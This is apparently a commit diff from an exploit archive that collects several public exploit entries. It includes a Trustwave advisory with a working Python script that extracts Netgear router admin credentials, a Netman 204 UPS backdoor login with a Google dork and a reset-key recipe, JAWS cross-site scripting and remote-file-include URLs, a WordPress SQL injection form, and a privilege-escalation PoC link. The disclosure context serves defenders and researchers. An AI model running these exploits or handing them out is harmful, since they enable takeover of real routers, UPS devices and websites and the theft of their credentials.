# R6200v2 V1.0.1.20_1.0.18
|
||||
# R6250 V1.0.4.6_10.1.12 (Latest beta)
|
||||
# R6250 V1.0.4.2_10.1.10 (Latest stable)
|
||||
# R6250 V1.0.1.84_1.0.78
|
||||
# R6300 V1.0.2.78_1.0.58 (Latest)
|
||||
# R6300v2 V1.0.4.2_10.0.74 (V1.0.4.6_10.0.76 is latest and is patched)
|
||||
# R6300v2 V1.0.3.6_1.0.63CH (Charter Comm.)
|
||||
# R6400 V1.0.0.26_1.0.14 (V1.0.1.12_1.0.11 is latest and is patched)
|
||||
# R6700 V1.0.0.26_10.0.26 (Latest)
|
||||
# R6700 V1.0.0.24_10.0.18
|
||||
# R6900 V1.0.0.4_1.0.10 (Latest)
|
||||
# R7000 V1.0.6.28_1.1.83 (V1.0.7.2_1.1.93 is latest and is patched)
|
||||
# R7000 V1.0.4.30_1.1.67
|
||||
# R7900 V1.0.1.8_10.0.14 (Latest beta)
|
||||
# R7900 V1.0.1.4_10.0.12 (Latest stable)
|
||||
# R7900 V1.0.0.10_10.0.7
|
||||
# R7900 V1.0.0.8_10.0.5
|
||||
# R7900 V1.0.0.6_10.0.4
|
||||
# R8000 V1.0.3.26_1.1.18 (Latest beta)
|
||||
# R8000 V1.0.3.4_1.1.2 (Latest stable)
|
||||
# R8300 V1.0.2.48_1.0.52
|
||||
# R8500 V1.0.0.56_1.0.28 (V1.0.2.64_1.0.62 and above is patched)
|
||||
# R8500 V1.0.2.30_1.0.43
|
||||
# VEGN2610 V1.0.0.35_1.0.35 (Latest)
|
||||
# VEGN2610 V1.0.0.27_1.0.27
|
||||
# VEGN2610-1FXAUS V1.0.0.36_1.0.36 (Latest)
|
||||
# VEVG2660 V1.0.0.23_1.0.23
|
||||
# WNDR3400v2 V1.0.0.52_1.0.81 (Latest)
|
||||
# WNDR3400v3 V1.0.1.4_1.0.52 (Latest)
|
||||
# WNDR3400v3 V1.0.1.2_1.0.51
|
||||
# WNDR3400v3 V1.0.0.22_1.0.29
|
||||
# WNDR3700v3 V1.0.0.38_1.0.31 (Latest)
|
||||
# WNDR4000 V1.0.2.4_9.1.86 (Latest)
|
||||
# WNDR4500 V1.0.1.40_1.0.68 (Latest)
|
||||
# WNDR4500 V1.0.1.6_1.0.24
|
||||
# WNDR4500v2 V1.0.0.60_1.0.38 (Latest)
|
||||
# WNDR4500v2 V1.0.0.50_1.0.30
|
||||
# WNR1000v3 V1.0.2.68_60.0.93NA (Latest)
|
||||
# WNR1000v3 V1.0.2.62_60.0.87 (Latest)
|
||||
# WNR3500Lv2 V1.2.0.34_40.0.75 (Latest)
|
||||
# WNR3500Lv2 V1.2.0.32_40.0.74
|
||||
# WGR614v10 V1.0.2.60_60.0.85NA (Latest)
|
||||
# WGR614v10 V1.0.2.58_60.0.84NA
|
||||
# WGR614v10 V1.0.2.54_60.0.82NA
|
||||
|
||||
# Lenovo R3220 V1.0.0.16_1.0.16 (Latest)
|
||||
# Lenovo R3220 V1.0.0.13_1.0.13
|
||||
|
||||
|
||||
Many Netgear routers are prone to password disclosure via simple crafted
|
||||
request to the web management server. The bug is exploitable remotely if the
|
||||
remote management option is set and can also be exploited given access to the
|
||||
router over LAN or WLAN.
|
||||
|
||||
Netgear routers have an option to restore forgotten password via 2 security
|
||||
questions. If the recovery option is disabled (which is the default), it is
|
||||
still possible to recover the password by sending a correct token to the
|
||||
recovery page.
|
||||
|
||||
If a user supplies the correct token to the page
|
||||
http://router/passwordrecovered.cgi?id=TOKEN (and password recovery is not
|
||||
enabled), they will receive the admin password for the router. If password
|
||||
recovery is set the exploit will fail, as it will ask the user for the recovery
|
||||
questions which were previously set when enabling the feature, this is
|
||||
persistent, even after disabling the recovery option, the exploit will fail,
|
||||
because the router will ask for the security questions.
|
||||
|
||||
This mechanism does not work correctly on the very first request to
|
||||
"passwordrecovered.cgi" and the token is not properly checked, this means that
|
||||
any TOKEN value will result in disclosure of the password.
|
||||
The issue occurs after every reboot of the router.
|
||||
|
||||
This can easily be reproduced using the attached poc, or by sending a simple
|
||||
request via the browser:
|
||||
1. http://router/passwordrecovered.cgi?id=Trustwave_SpiderLabs will give you credentials (some models require you to send a post request instead of get)
|
||||
|
||||
## netgore2.py
|
||||
import sys
|
||||
import requests
|
||||
|
||||
def scrape(text, start_trig, end_trig):
|
||||
if text.find(start_trig) != -1:
|
||||
return text.split(start_trig, 1)[-1].split(end_trig, 1)[0]
|
||||
else:
|
||||
return "i_dont_speak_english"
|
||||
#disable nasty insecure ssl warning
|
||||
requests.packages.urllib3.disable_warnings()
|
||||
#1st stage
|
||||
ip = sys.argv[1]
|
||||
port = sys.argv[2]
|
||||
url = 'http://' + ip + ':' + port + '/'
|
||||
try:
|
||||
r = requests.get(url)
|
||||
except:
|
||||
url = 'https://' + ip + ':' + port + '/'
|
||||
r = requests.get(url, verify=False)
|
||||
model = r.headers.get('WWW-Authenticate')
|
||||
if model is not None:
|
||||
print "Attcking: " + model[13:-1]
|
||||
else:
|
||||
print "not a netgear router"
|
||||
sys.exit(0)
|
||||
#2nd stage
|
||||
url = url + 'passwordrecovered.cgi?id=get_rekt'
|
||||
try:
|
||||
r = requests.post(url, verify=False)
|
||||
except:
|
||||
print "not vulnerable router"
|
||||
sys.exit(0)
|
||||
#profit
|
||||
if r.text.find('left\">') != -1:
|
||||
username = (repr(scrape(r.text, 'Router Admin Username</td>', '</td>')))
|
||||
username = scrape(username, '>', '\'')
|
||||
password = (repr(scrape(r.text, 'Router Admin Password</td>', '</td>')))
|
||||
password = scrape(password, '>', '\'')
|
||||
if username == "i_dont_speak_english":
|
||||
username = (scrape(r.text[r.text.find('left\">'):-1], 'left\">', '</td>'))
|
||||
password = (scrape(r.text[r.text.rfind('left\">'):-1], 'left\">', '</td>'))
|
||||
else:
|
||||
print "not vulnerable router, or some one else already accessed passwordrecovered.cgi, reboot router and test again"
|
||||
sys.exit(0)
|
||||
#html encoding pops out of nowhere, lets replace that
|
||||
password = password.replace("#","#")
|
||||
password = password.replace("&","&")
|
||||
print "user: " + username
|
||||
print "pass: " + password
|
||||
|
||||
================================
|
||||
Just run the PoC against a router to get the credentials if it is vulnerable.
|
||||
|
||||
|
||||
|
||||
|
||||
Remediation Steps:
|
||||
Please see NETGEAR's KBA for list of firmware patches for various models. As a
|
||||
workaround, the bug only works when password recovery is NOT set. If you do set
|
||||
password recovery this is not exploitable.
|
||||
|
||||
Revision History:
|
||||
04/06/2016 - Vulnerability disclosed to vendor
|
||||
04/19/2016 - Request for update and received confirmation of receipt of the advisories
|
||||
05/18/2016 - Request for update; no response
|
||||
07/14/2016 - Request for update
|
||||
07/15/2016 - Notice of patch for some models and workaround KBA received along with commitment towards 100% coverage
|
||||
10/17/2016 - Request for update
|
||||
12/15/2016 - Notice of intent to publish advisories
|
||||
01/04/2017 - Vendor responds with patch timeline and announcement of participation in Bugcrowd
|
||||
01/30/2017 - Advisory published
|
||||
|
||||
|
||||
References
|
||||
1. http://c1ph04text.blogspot.com/2014/01/mitrm-attacks-your-middle-or-mine.html
|
||||
2. https://www.exploit-db.com/exploits/32883/
|
||||
3. http://kb.netgear.com/30632/Web-GUI-Password-Recovery-and-Exposure-Security-Vulnerability
|
||||
|
||||
|
||||
About Trustwave:
|
||||
Trustwave is the leading provider of on-demand and subscription-based
|
||||
information security and payment card industry compliance management
|
||||
solutions to businesses and government entities throughout the world. For
|
||||
organizations faced with today's challenging data security and compliance
|
||||
environment, Trustwave provides a unique approach with comprehensive
|
||||
solutions that include its flagship TrustKeeper compliance management
|
||||
software and other proprietary security solutions. Trustwave has helped
|
||||
thousands of organizations--ranging from Fortune 500 businesses and large
|
||||
financial institutions to small and medium-sized retailers--manage
|
||||
compliance and secure their network infrastructure, data communications and
|
||||
critical information assets. Trustwave is headquartered in Chicago with
|
||||
offices throughout North America, South America, Europe, Africa, China and
|
||||
Australia. For more information, visit https://www.trustwave.com
|
||||
|
||||
About Trustwave SpiderLabs:
|
||||
SpiderLabs(R) is the advanced security team at Trustwave focused on
|
||||
application security, incident response, penetration testing, physical
|
||||
security and security research. The team has performed over a thousand
|
||||
incident investigations, thousands of penetration tests and hundreds of
|
||||
application security tests globally. In addition, the SpiderLabs Research
|
||||
team provides intelligence through bleeding-edge research and proof of
|
||||
concept tool development to enhance Trustwave's products and services.
|
||||
https://www.trustwave.com/spiderlabs
|
||||
|
||||
Disclaimer:
|
||||
The information provided in this advisory is provided "as is" without
|
||||
warranty of any kind. Trustwave disclaims all warranties, either express or
|
||||
implied, including the warranties of merchantability and fitness for a
|
||||
particular purpose. In no event shall Trustwave or its suppliers be liable
|
||||
for any damages whatsoever including direct, indirect, incidental,
|
||||
consequential, loss of business profits or special damages, even if
|
||||
Trustwave or its suppliers have been advised of the possibility of such
|
||||
damages. Some states do not allow the exclusion or limitation of liability
|
||||
for consequential or incidental damages so the foregoing limitation may not
|
||||
apply.
|
45
platforms/hardware/webapps/41208.txt
Executable file
45
platforms/hardware/webapps/41208.txt
Executable file
|
@ -0,0 +1,45 @@
|
|||
# Exploit Title: Netman 204 Backdoor and weak password recovery function
|
||||
# Google Dork: intitle:"Netman 204 login"
|
||||
# Date: 31st Jan 2017
|
||||
# Exploit Author: Simon Gurney
|
||||
# Vendor Homepage: blog.synack.co.uk
|
||||
# Software Link: http://www.riello-ups.co.uk/uploads/file/319/1319/FW058-0105__FW_B0225_NetMan_204_.zip
|
||||
# Version: S14-1 and S15-2
|
||||
# Tested on: Reillo UPS
|
||||
# CVE : N/A
|
||||
|
||||
Netman 204 cards have a backdoor account eurek:eurek.
|
||||
|
||||
This account can be logged with by simply browsing to the URL
|
||||
http://[IP]/cgi-bin/login.cgi?username=eurek&password=eurek
|
||||
or
|
||||
https://[IP]/cgi-bin/login.cgi?username=eurek&password=eurek
|
||||
|
||||
Due to flaws in parameter validation, the URL can be shortened to:
|
||||
http://[IP]/cgi-bin/login.cgi?username=eurek%20eurek
|
||||
or
|
||||
https://[IP]/cgi-bin/login.cgi?username=eurek%20eurek
|
||||
|
||||
This backdoor has previously been reported by Saeed reza Zamanian under EDB-ID: 40431 here<https://www.exploit-db.com/exploits/40431/>, which shows how to utilise this to gain shell access however this did not give detail of how easy it is to log in to the device and access the administrative functions via the web interface. The google dork provided also reveals some UPS exposed to the internet.
|
||||
|
||||
If an admin has changed the passwords, they can be reset by generating a reset key from the MAC address if you are on the same subnet:
|
||||
|
||||
NETMANID=204:`/sbin/ifconfig eth0 | awk '/HWaddr/ {print $NF}' `
|
||||
KEY=`echo .$NETMANID | md5sum | cut -c2-10`
|
||||
|
||||
To generate the key, do an MD5 hash of 204:[MAC ADDRESS]
|
||||
Such as,
|
||||
204:AA:BB:CC:DD:EE:FF == 0354a655811843aab718cfcf973c7dab
|
||||
Then take characters 2-10, where position 1 is character 1 (not 0).
|
||||
Such as,
|
||||
354a65581
|
||||
|
||||
Then browse to the url:
|
||||
http://[ip]/cgi-bin/recover2.cgi?password=354a65581
|
||||
or
|
||||
https://[ip]/cgi-bin/recover2.cgi?password=354a65581
|
||||
|
||||
|
||||
Passwords have now been reset.
|
||||
|
||||
|
|
@ -8,5 +8,4 @@ This may facilitate the theft of cookie-based authentication credentials as well
|
|||
|
||||
JAWS versions 0.4 and 0.5 and subsequent are reportedly vulnerable.
|
||||
|
||||
http://www.example.com/index.php?gadget=Glossary&action=ViewTerm&term=<script
|
||||
src=some script</script>
|
||||
http://www.example.com/index.php?gadget=Glossary&action=ViewTerm&term=<script src=some script</script>
|
|
@ -4,5 +4,4 @@ JAWS is prone to a remote file include vulnerability. This issue is due to a fai
|
|||
|
||||
An attacker may leverage this issue to execute arbitrary server-side script code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access.
|
||||
|
||||
http://www.example.com/[path]/gadgets/Blog/BlogModel.php?path=
|
||||
http://www.example.com
|
||||
http://www.example.com/[path]/gadgets/Blog/BlogModel.php?path=http://www.example.com
|
|
@ -1,7 +1,6 @@
|
|||
# Exploit Title: WP Private Messages 1.0.1 – Plugin WordPress – Sql Injection
|
||||
# Exploit Title: WP Email Users – 1.4.1 – Plugin WordPress – Sql Injection
|
||||
# Exploit Author: Lenon Leite
|
||||
# Vendor Homepage: https://wordpress.org/plugins/wp-email-users/
|
||||
|
||||
# Software Link: https://wordpress.org/plugins/wp-email-users/
|
||||
# Contact: http://twitter.com/lenonleite
|
||||
# Website: http://lenonleite.com.br/
|
||||
|
@ -11,7 +10,7 @@
|
|||
|
||||
1 - Description:
|
||||
|
||||
Type user access: is accessible for any registered user
|
||||
Type user access: is accessible for any registered user
|
||||
|
||||
$_REQUEST[‘edit’] is escaped wrong. Attack with Sql Injection
|
||||
|
||||
|
@ -24,15 +23,14 @@ http://lenonleite.com.br/blog/2017/01/17/english-wp-email-users-1-4-1-plugin-wor
|
|||
2 – Using:
|
||||
|
||||
<form action="http://localhost:8080/wp-admin/admin-ajax.php" method="post">
|
||||
<input type="text" name="action" value="weu_my_action">
|
||||
<input type="text" name="filetitle" value="0 UNION SELECT
|
||||
CONCAT(name,char(58),slug) FROM wp_terms WHERE term_id=1">
|
||||
<input type="text" name="temp_sel_key" value="select_temp">
|
||||
<input type="submit" name="">
|
||||
<input type="text" name="action" value="weu_my_action">
|
||||
<input type="text" name="filetitle" value="0 UNION SELECT CONCAT(name,char(58),slug) FROM wp_terms WHERE term_id=1">
|
||||
<input type="text" name="temp_sel_key" value="select_temp">
|
||||
<input type="submit" name="">
|
||||
</form>
|
||||
|
||||
|
||||
3 - Timeline:
|
||||
|
||||
- 12/01/2016 – Discovered
|
||||
- 13/12/2016 – Vendor not finded
|
||||
12/01/2016 – Discovered
|
||||
13/12/2016 – Vendor not finded
|
||||
|
|
18
platforms/php/webapps/41204.txt
Executable file
18
platforms/php/webapps/41204.txt
Executable file
|
@ -0,0 +1,18 @@
|
|||
# # # # #
|
||||
# Exploit Title: Video Sharing Script 4.94 - 'uid' Parameter SQL Injection
|
||||
# Google Dork: N/A
|
||||
# Date: 30.01.2017
|
||||
# Vendor Homepage: http://itechscripts.com/
|
||||
# Software Buy: http://itechscripts.com/video-sharing-script/
|
||||
# Demo: http://video-sharing.itechscripts.com/
|
||||
# Version: 4.94
|
||||
# Tested on: Win7 x64, Kali Linux x64
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Mail : ihsan[beygir]ihsan[nokta]net
|
||||
# # # # #
|
||||
# SQL Injection/Exploit :
|
||||
# http://localhost/[PATH]/channels.php?uid=[SQL]
|
||||
# E.t.c
|
||||
# # # # #
|
23
platforms/windows/local/41207.txt
Executable file
23
platforms/windows/local/41207.txt
Executable file
|
@ -0,0 +1,23 @@
|
|||
# Exploit Title: Viscosity for Windows 1.6.7 Privilege Escalation
|
||||
# Date: 31.01.2017
|
||||
# Software Link: https://www.sparklabs.com/
|
||||
# Exploit Author: Kacper Szurek
|
||||
# Contact: https://twitter.com/KacperSzurek
|
||||
# Website: https://security.szurek.pl/
|
||||
# Category: local
|
||||
|
||||
1. Description
|
||||
|
||||
It is possible to execute openvpn with custom dll as SYSTEM using ViscosityService because path is not correctly validated.
|
||||
|
||||
https://security.szurek.pl/viscosity-for-windows-167-privilege-escalation.html
|
||||
|
||||
2. Proof of Concept
|
||||
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41207.zip
|
||||
|
||||
3. Solution
|
||||
|
||||
Update to version 1.6.8
|
||||
|
||||
https://www.sparklabs.com/blog/viscosity-for-mac-windows-version-1-6-8/
|
Loading…
Add table
Reference in a new issue